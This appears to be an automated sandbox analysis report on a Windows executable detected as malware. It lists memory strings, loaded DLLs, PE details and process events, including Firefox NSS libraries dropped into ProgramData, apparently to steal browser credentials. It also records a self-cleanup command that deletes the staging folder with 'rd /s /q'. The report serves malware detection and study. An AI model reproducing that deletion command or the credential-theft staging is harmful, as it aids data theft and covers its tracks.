                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                          Source: UMrFwHyjUi.exe, UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285331275.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, BFBFBF.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: UMrFwHyjUi.exeReversingLabs: Detection: 65%
                          Source: unknownProcess created: C:\Users\user\Desktop\UMrFwHyjUi.exe "C:\Users\user\Desktop\UMrFwHyjUi.exe"
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess created: C:\Users\user\Desktop\UMrFwHyjUi.exe "C:\Users\user\Desktop\UMrFwHyjUi.exe"
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess created: C:\Users\user\Desktop\UMrFwHyjUi.exe "C:\Users\user\Desktop\UMrFwHyjUi.exe"
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 272
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess created: C:\Users\user\Desktop\UMrFwHyjUi.exe "C:\Users\user\Desktop\UMrFwHyjUi.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess created: C:\Users\user\Desktop\UMrFwHyjUi.exe "C:\Users\user\Desktop\UMrFwHyjUi.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exitJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: UMrFwHyjUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: UMrFwHyjUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: UMrFwHyjUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: UMrFwHyjUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: UMrFwHyjUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: UMrFwHyjUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: UMrFwHyjUi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: UMrFwHyjUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: mozglue.pdbP source: UMrFwHyjUi.exe, 00000002.00000002.2720919729.000000006CEFD000.00000002.00000001.01000000.00000009.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.2.dr
                          Source: Binary string: freebl3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                          Source: Binary string: freebl3.pdbp source: UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                          Source: Binary string: nss3.pdb@ source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.2.dr
                          Source: Binary string: softokn3.pdb@ source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2712188709.0000000035E57000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2705821873.0000000029F71000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
                          Source: Binary string: nss3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.2.dr
                          Source: Binary string: mozglue.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2720919729.000000006CEFD000.00000002.00000001.01000000.00000009.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.2.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                          Source: UMrFwHyjUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: UMrFwHyjUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: UMrFwHyjUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: UMrFwHyjUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: UMrFwHyjUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00418995 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418995
                          Source: UMrFwHyjUi.exeStatic PE information: section name: .bsp
                          Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                          Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                          Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001F11F2 push ecx; ret 0_2_001F1205
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001F1540 push esp; retn 0003h0_2_001F1545
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001F1570 push cs; ret 0_2_001F1571
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_0019992C push ecx; ret 0_2_0019993F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001F3B75 push 0000004Ch; iretd 0_2_001F3B86
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001DFE65 push ecx; ret 0_2_001DFE78
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_00192F17 push eax; ret 0_2_00192F76
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_0019992C push ecx; ret 1_2_0019993F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_00192F17 push eax; ret 1_2_00192F76
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0042F192 push ecx; ret 2_2_0042F1A5
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00422D89 push esi; ret 2_2_00422D8B
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041DE05 push ecx; ret 2_2_0041DE18
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00432715 push 0000004Ch; iretd 2_2_00432726
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00418995 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418995
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
